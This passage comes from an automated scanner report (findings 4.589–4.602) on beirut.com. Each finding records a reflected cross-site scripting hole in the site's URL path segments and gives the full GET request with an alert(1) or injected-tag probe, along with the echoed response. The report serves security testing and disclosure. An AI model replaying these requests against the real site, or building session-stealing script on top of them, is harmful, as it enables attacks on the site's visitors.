User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:37:58 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58028

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Nightlife/Karaoke-Loungesa1d11'-alert(1)-'19f394ddeac';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.589. http://www.beirut.com/Nightlife/Lounges/9663063907 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Nightlife/Lounges/9663063907

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68cce"><a>358e2b3d9f2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Nightlife68cce"><a>358e2b3d9f2/Lounges/9663063907 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:17:26 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60025

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Nightlife68cce"><a>358e2b3d9f2">
...[SNIP]...

4.590. http://www.beirut.com/Nightlife/Lounges/9663063907 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Nightlife/Lounges/9663063907

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3604c'-alert(1)-'a12939d24e8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Nightlife3604c'-alert(1)-'a12939d24e8/Lounges/9663063907 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:24:30 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Nightlife3604c'-alert(1)-'a12939d24e8/Lounges';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.591. http://www.beirut.com/Nightlife/Lounges/9663063907 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Nightlife/Lounges/9663063907

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dbf60'-alert(1)-'bf7ec8f366e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Nightlife/Loungesdbf60'-alert(1)-'bf7ec8f366e/9663063907 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:29:16 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60755

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Nightlife/Loungesdbf60'-alert(1)-'bf7ec8f366e';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.592. http://www.beirut.com/Nightlife/Nightclubs/311071488 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Nightlife/Nightclubs/311071488

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a3af5'-alert(1)-'09ceb507a40 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Nightlifea3af5'-alert(1)-'09ceb507a40/Nightclubs/311071488 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:26:35 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59808

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Nightlifea3af5'-alert(1)-'09ceb507a40/Nightclubs';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.593. http://www.beirut.com/Nightlife/Nightclubs/311071488 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Nightlife/Nightclubs/311071488

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49148"><a>74117d2cdce was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Nightlife49148"><a>74117d2cdce/Nightclubs/311071488 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:21:14 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59390

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Nightlife49148"><a>74117d2cdce">
...[SNIP]...

4.594. http://www.beirut.com/Nightlife/Nightclubs/311071488 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Nightlife/Nightclubs/311071488

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 61c2a'-alert(1)-'96f348522ed was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Nightlife/Nightclubs61c2a'-alert(1)-'96f348522ed/311071488 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:31:13 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60942

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Nightlife/Nightclubs61c2a'-alert(1)-'96f348522ed';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.595. http://www.beirut.com/Nightlife/Pubs/242334555 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Nightlife/Pubs/242334555

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e7fca'-alert(1)-'bcd7c3d350 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Nightlifee7fca'-alert(1)-'bcd7c3d350/Pubs/242334555 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:20:01 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Nightlifee7fca'-alert(1)-'bcd7c3d350/Pubs';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.596. http://www.beirut.com/Nightlife/Pubs/242334555 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Nightlife/Pubs/242334555

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d189"><a>ee82da82aca was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Nightlife9d189"><a>ee82da82aca/Pubs/242334555 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:14:02 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59781

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Nightlife9d189"><a>ee82da82aca">
...[SNIP]...

4.597. http://www.beirut.com/Nightlife/Pubs/242334555 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Nightlife/Pubs/242334555

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3ab96'-alert(1)-'715bc2c72a5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Nightlife/Pubs3ab96'-alert(1)-'715bc2c72a5/242334555 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:25:26 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61026

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Nightlife/Pubs3ab96'-alert(1)-'715bc2c72a5';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.598. http://www.beirut.com/Nightlife/Super-Nightclub/131874060 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Nightlife/Super-Nightclub/131874060

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 931bc'-alert(1)-'963b289fa78 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Nightlife931bc'-alert(1)-'963b289fa78/Super-Nightclub/131874060 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:29:46 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59878

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Nightlife931bc'-alert(1)-'963b289fa78/Super-Nightclub';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.599. http://www.beirut.com/Nightlife/Super-Nightclub/131874060 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Nightlife/Super-Nightclub/131874060

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3bbe2"><a>f25926c30b4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Nightlife3bbe2"><a>f25926c30b4/Super-Nightclub/131874060 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:22:57 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59794

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Nightlife3bbe2"><a>f25926c30b4">
...[SNIP]...

4.600. http://www.beirut.com/Nightlife/Super-Nightclub/131874060 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Nightlife/Super-Nightclub/131874060

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d504f'-alert(1)-'2563b831f04 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Nightlife/Super-Nightclubd504f'-alert(1)-'2563b831f04/131874060 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:33:53 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58635

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Nightlife/Super-Nightclubd504f'-alert(1)-'2563b831f04';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.601. http://www.beirut.com/Online-Internet/Blogs [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Online-Internet/Blogs

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d58d"><a>ac48a56578b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Online-Internet8d58d"><a>ac48a56578b/Blogs HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:43:20 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Online-Internet8d58d"><a>ac48a56578b">
...[SNIP]...

4.602. http://www.beirut.com/Online-Internet/Blogs [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Online-Internet/Blogs

